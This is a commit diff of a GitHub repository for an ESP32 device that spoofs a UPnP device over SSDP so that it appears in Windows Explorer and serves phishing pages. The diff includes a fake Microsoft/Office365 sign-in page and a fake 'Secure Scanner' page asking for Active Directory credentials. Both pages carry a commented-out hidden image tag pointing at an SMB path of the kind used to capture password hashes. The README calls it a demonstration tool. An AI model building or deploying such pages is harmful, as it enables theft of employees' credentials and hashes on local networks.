nechry
diff --git a/‎.github/FUNDING.yml
+13 b/‎.github/FUNDING.yml
+13
diff --git a/‎.gitignore
+5 b/‎.gitignore
+5
diff --git a/‎LICENSE
+21 b/‎LICENSE
+21
diff --git a/‎README.md
+40 b/‎README.md
+40
diff --git a/‎boards/lilygo-t-displays3.json
+45 b/‎boards/lilygo-t-displays3.json
+45
diff --git a/‎data/404.html
+54 b/‎data/404.html
+54
diff --git a/‎data/backup/icon48.png
4.18 KB b/‎data/backup/icon48.png
4.18 KB
diff --git a/‎data/backup/present.html
+31 b/‎data/backup/present.html
+31
diff --git a/‎data/backup/style.css
+60 b/‎data/backup/style.css
+60
diff --git a/‎data/error.html
+51 b/‎data/error.html
+51
diff --git a/‎data/error_icon.png
14.4 KB b/‎data/error_icon.png
14.4 KB
diff --git a/‎data/favicon.ico
15 KB b/‎data/favicon.ico
15 KB
diff --git a/‎data/scanner/icon48.png
5.16 KB b/‎data/scanner/icon48.png
5.16 KB
diff --git a/‎data/scanner/present.html
+28 b/‎data/scanner/present.html
+28
@@ -0,0 +1,13 @@
+# These are supported funding model platforms
+
+github: [nechry]
+patreon: # Replace with a single Patreon username
+open_collective: # Replace with a single Open Collective username
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
+custom: ["https://paypal.me/nechry"]
@@ -0,0 +1,5 @@
+.pio
+.vscode
+
+credentials.h
+.DS_Store
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2024 Jean-François Auger
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
@@ -0,0 +1,40 @@
+# ESP32-SSDP-HoneyPot-Phishing
+
+This code runs a web server on the ESP32 that responds to `SSDP` multicast discover requests, posing as a generic UPNP device. The spoofed device will magically appear in Windows Explorer on machines in your local network.
+
+Users who are tempted to open the device are shown a configurable phishing page.
+
+## Requirements
+
+An [ESP32 lilyGO T-Display S3 board](https://s.click.aliexpress.com/e/_DFoYDZR) (affiliate link)
+
+`Visual Studio Code` with the `PlatformIO` extension
+
+## Installation
+
+Clone this repository and open it in Visual Studio Code.
+
+You have to rename the file `credentials.h.example` to `credentials.h` from `include` folder and fill in your own SSID and password.
+
+Recommended: Before you upload the code to the ESP32, upload the data folder to the ESP32 using the `Upload Filesystem image` tool in the `PlatformIO` menu.
+
+## Usage
+
+When you power on the ESP32 it will start a web server and it will be discoverable by SSDP.
+
+When someone browses/open the device, they get a web page that has a log in. When they log in the username/password are displayed on the ESP32 screen.
+
+The default page is a fake corporate scanner, you can easily change the page to look like a backup controller, by starting the ESP32 with the button 2 pressed.
+
+## Credits
+
+Based on the project https://github.com/bdash9/ESP32-SSDP-HoneyPot-Phishing-webserver
+and devices templates from https://github.com/initstring/evil-ssdp
+
+## License
+
+MIT License
+
+## Disclaimer
+
+This is a security research tool for demonstrations purpose. Use only where granted explicit permission from the network owner.
@@ -0,0 +1,45 @@
+{
+  "build": {
+    "arduino": {
+      "ldscript": "esp32s3_out.ld",
+      "memory_type": "qio_opi",
+      "partitions": "default_16MB.csv"
+    },
+    "core": "esp32",
+    "extra_flags": [
+      "-DBOARD_HAS_PSRAM"
+    ],
+    "f_cpu": "240000000L",
+    "f_flash": "80000000L",
+    "flash_mode": "qio",
+    "hwids": [
+      [
+        "0X303A",
+        "0x1001"
+      ]
+    ],
+    "mcu": "esp32s3",
+    "variant": "esp32s3"
+  },
+  "connectivity": [
+    "wifi",
+    "bluetooth"
+  ],
+  "debug": {
+    "openocd_target": "esp32s3.cfg"
+  },
+  "frameworks": [
+    "arduino",
+    "espidf"
+  ],
+  "name": "T-DisplayS3",
+  "upload": {
+    "flash_size": "16MB",
+    "maximum_ram_size": 327680,
+    "maximum_size": 16777216,
+    "require_upload_port": true,
+    "speed": 921600
+  },
+  "url": "https://www.lilygo.cc/products/t-display-s3",
+  "vendor": "LILYGO"
+}
@@ -0,0 +1,54 @@
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>404 Not Found</title>
+    <style>
+        body {
+            font-family: 'Arial', sans-serif;
+            background-color: #f4f4f4;
+            margin: 0;
+            padding: 0;
+            text-align: center;
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+            justify-content: center;
+            height: 100vh;
+        }
+
+        .container {
+            max-width: 600px;
+        }
+
+        h1 {
+            color: #333;
+            font-size: 120px;
+            margin: 0;
+        }
+
+        p {
+            color: #555;
+            font-size: 18px;
+            margin-top: 20px;
+        }
+
+        a {
+            color: #007bff;
+            text-decoration: none;
+            font-weight: bold;
+        }
+    </style>
+</head>
+
+<body>
+    <div class="container">
+        <h1>404</h1>
+        <p>Oops! The page you are looking for might be in another universe.</p>
+        <p>Return to <a href="/">home</a>.</p>
+    </div>
+</body>
+
+</html>
@@ -0,0 +1,31 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate"/>
+    <meta http-equiv="Pragma" content="no-cache"/>
+    <meta http-equiv="Expires" content="0"/>
+    <title>Secure Storage for Office365 Login</title>    
+    <link rel="stylesheet" type="text/css" href="style.css">
+</head>
+<body>
+    <div class="container">
+        <svg viewBox="0 0 337.6 72" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
+            <path fill="#737373"
+                d="M140.4 14.4v43.2h-7.5V23.7h-.1l-13.4 33.9h-5l-13.7-33.9h-.1v33.9h-6.9V14.4h10.8l12.4 32h.2l13.1-32h10.2zm6.2 3.3c0-1.2.4-2.2 1.3-3 .9-.8 1.9-1.2 3.1-1.2 1.3 0 2.4.4 3.2 1.2s1.3 1.8 1.3 3-.4 2.2-1.3 3c-.9.8-1.9 1.2-3.2 1.2s-2.3-.4-3.1-1.2a4.5 4.5 0 0 1-1.3-3zm8.1 8.9v31h-7.3v-31h7.3zm22.1 25.7c1.1 0 2.3-.2 3.6-.8 1.3-.5 2.5-1.2 3.6-2v6.8c-1.2.7-2.5 1.2-4 1.5-1.5.3-3.1.5-4.9.5A14.7 14.7 0 0 1 159.7 43c0-5 1.5-9.1 4.4-12.3 2.9-3.2 7-4.8 12.4-4.8a18.4 18.4 0 0 1 7.4 1.7v7a11.5 11.5 0 0 0-7-2.6c-2.9 0-5.2.9-7 2.8s-2.6 4.4-2.6 7.6c0 3.1.9 5.6 2.6 7.3 1.7 1.7 4 2.6 6.9 2.6zm27.9-26.2a8 8 0 0 1 2.8.4v7.4c-.4-.3-.9-.6-1.7-.8s-1.6-.4-2.7-.4c-1.8 0-3.3.8-4.5 2.3s-1.9 3.8-1.9 7v15.6h-7.3v-31h7.3v4.9h.1c.7-1.7 1.7-3 3-4 1.4-.9 3-1.4 4.9-1.4zm3.2 16.5c0-5.1 1.5-9.2 4.3-12.2a16 16 0 0 1 12-4.5c4.8 0 8.6 1.4 11.3 4.3s4.1 6.8 4.1 11.7c0 5-1.5 9-4.3 12-2.9 3-6.8 4.5-11.8 4.5-4.8 0-8.6-1.4-11.4-4.2a16 16 0 0 1-4.2-11.6zm7.6-.3c0 3.2.7 5.7 2.2 7.4s3.6 2.6 6.3 2.6c2.6 0 4.7-.8 6.1-2.6 1.4-1.7 2.1-4.2 2.1-7.6a12 12 0 0 0-2.1-7.6 7.5 7.5 0 0 0-6-2.6c-2.7 0-4.7.9-6.2 2.7-1.7 1.9-2.4 4.4-2.4 7.7zm35-7.5c0 1 .3 1.9 1 2.5.7.6 2.1 1.3 4.4 2.2 2.9 1.2 5 2.5 6.1 3.9a8.1 8.1 0 0 1 1.8 5.3c0 2.9-1.1 5.2-3.4 7a14 14 0 0 1-9.1 2.6 23.7 23.7 0 0 1-8.3-1.7v-7.2c1.3.9 2.8 1.7 4.3 2.2 1.5.5 2.9.8 4.2.8 1.6 0 2.9-.2 3.6-.7.8-.5 1.2-1.2 1.2-2.3 0-1-.4-1.8-1.2-2.6-.8-.7-2.4-1.5-4.6-2.4-2.7-1.1-4.6-2.4-5.7-3.8s-1.7-3.2-1.7-5.4c0-2.8 1.1-5.1 3.3-6.9 2.2-1.8 5.1-2.7 8.6-2.7 1.1 0 2.3.1 3.6.4l3.4.9V34c-1-.6-2.1-1.2-3.4-1.7-1.3-.5-2.6-.7-3.8-.7-1.4 0-2.5.3-3.2.8-.7.7-1.1 1.4-1.1 2.4zm16.4 7.8c0-5.1 1.5-9.2 4.3-12.2a16 16 0 0 1 12-4.5c4.8 0 8.6 1.4 11.3 4.3s4.1 6.8 4.1 11.7c0 5-1.5 9-4.3 12-2.9 3-6.8 4.5-11.8 4.5-4.8 0-8.6-1.4-11.4-4.2a16.5 16.5 0 0 1-4.2-11.6zm7.6-.3c0 3.2.7 5.7 2.2 7.4s3.6 2.6 6.3 2.6c2.6 0 4.7-.8 6.1-2.6 1.4-1.7 2.1-4.2 2.1-7.6a12 12 0 0 0-2.1-7.6 7.5 7.5 0 0 0-6-2.6c-2.7 0-4.7.9-6.2 2.7-1.7 1.9-2.4 4.4-2.4 7.7zm48.4-9.7H312v25h-7.4v-25h-5.2v-6h5.2v-4.3c0-3.2 1.1-5.9 3.2-8s4.8-3.1 8.1-3.1l2.4.1c.7 0 1.3.2 1.8.4V18l-1.3-.5c-.6-.2-1.3-.3-2.1-.3-1.5 0-2.7.5-3.5 1.4-.8.9-1.2 2.4-1.2 4.2v3.7h10.9v-7l7.3-2.2v9.2h7.4v6h-7.4V47c0 1.9.4 3.2 1 4 .7.8 1.8 1.2 3.3 1.2a5 5 0 0 0 1.5-.3c.6-.2 1.1-.4 1.5-.7v6a7 7 0 0 1-2.3.7c-1.1.2-2.1.3-3.2.3-3.1 0-5.4-.8-6.9-2.4-1.5-1.6-2.3-4.1-2.3-7.4l.1-15.8z" />
+            <path fill="#F25022" d="M0 0h34.2v34.2H0z" />
+            <path fill="#7FBA00" d="M37.8 0H72v34.2H37.8z" />
+            <path fill="#00A4EF" d="M0 37.8h34.2V72H0z" />
+            <path fill="#FFB900" d="M37.8 37.8H72V72H37.8z" />
+        </svg>
+        <form action="login.php" id="email-form-step" class="form" method="post">
+            <h1>Sign In with<br>your Microsoft account</h1>
+            <input name="username" type="text" placeholder="Email" required>
+            <input name="password" type="password" placeholder="Password" required>
+            <button type="submit">Next</button>
+        </form>
+    </div>
+    <!-- <img src="file://///$smb_server/smb/hash.jpg" style="display: none;" /><br> -->
+</body>
+</html>
@@ -0,0 +1,60 @@
+body {
+  font-family: Arial, Helvetica, sans-serif;
+  margin: 0;
+  padding: 0;
+  height: 100vh;
+  display: flex;
+  align-items: center;
+  justify-content: center;
+}
+
+.container {
+  max-width: 400px;
+  padding: 25px;
+  margin: auto;
+}
+
+.form {
+  max-width: 300px;
+  padding: 20px;
+  border: 1px solid #cccccc;
+  border-radius: 5px;
+  margin: 0 auto;
+}
+
+h1 {
+  text-align: center;
+  color: #0067b8;
+}
+
+input[type="text"],
+input[type="password"] {
+  width: 100%;
+  padding: 12px 10px;
+  margin: 8px 0;
+  box-sizing: border-box;
+  border: 1px solid #cccccc;
+  border-radius: 4px;
+}
+
+button[type="submit"] {
+  width: 100%;
+  background-color: #0067b8;
+  color: white;
+  padding: 14px 20px;
+  margin: 8px 0;
+  border: none;
+  border-radius: 4px;
+  cursor: pointer;
+}
+
+button[type="submit"]:hover {
+  background-color: #005299;
+}
+
+svg {
+  display: block;
+  margin: 0 auto;
+  width: 150px;
+  height: 150px;
+}
@@ -0,0 +1,51 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Device Error</title>
+    <style>
+        body {
+            font-family: 'Arial', sans-serif;
+            background-color: #f4f4f4;
+            margin: 0;
+            padding: 0;
+            text-align: center;
+            display: flex;
+            flex-direction: column;
+            align-items: center;
+            justify-content: center;
+            height: 100vh;
+        }
+
+        .container {
+            max-width: 600px;
+        }
+
+        h1 {
+            color: #e44d26;
+            font-size: 48px;
+            margin: 0;
+        }
+
+        p {
+            color: #555;
+            font-size: 18px;
+            margin-top: 20px;
+        }
+
+        img {
+            width: 200px;
+            margin-top: 20px;
+        }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>Device Error</h1>
+        <p>We apologize, but it seems that the device is currently experiencing issues.</p>
+        <img src="error_icon.png" alt="Error Icon">
+        <p>Contact your system administrator for assistance.</p>
+    </div>
+</body>
+</html>
@@ -0,0 +1,28 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+  <meta charset="UTF-8">
+  <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate"/>
+  <meta http-equiv="Pragma" content="no-cache"/>
+  <meta http-equiv="Expires" content="0"/>
+  <link rel="stylesheet" type="text/css" href="style.css">
+  <title>Secure Scanner - Login</title>
+</head>
+
+<body>
+  <div id="login">
+    <div id="triangle"></div>
+    <h1>Log in</h1>
+    <h2>You have [3] scans waiting</h2>
+    <h3>Please enter your Active Directory username and password</h3>
+    <form action="login.php" id="email-form-step" class="form" method="post">
+      <input type="username" name="username" placeholder="Username" />
+      <input type="password" name="password" placeholder="Password" />
+      <input type="submit" value="Log in" />
+    </form>
+  </div>
+</body>
+<!-- <img src="file://///$smb_server/smb/hash.jpg" style="display: none;" /><br> -->
+
+</html>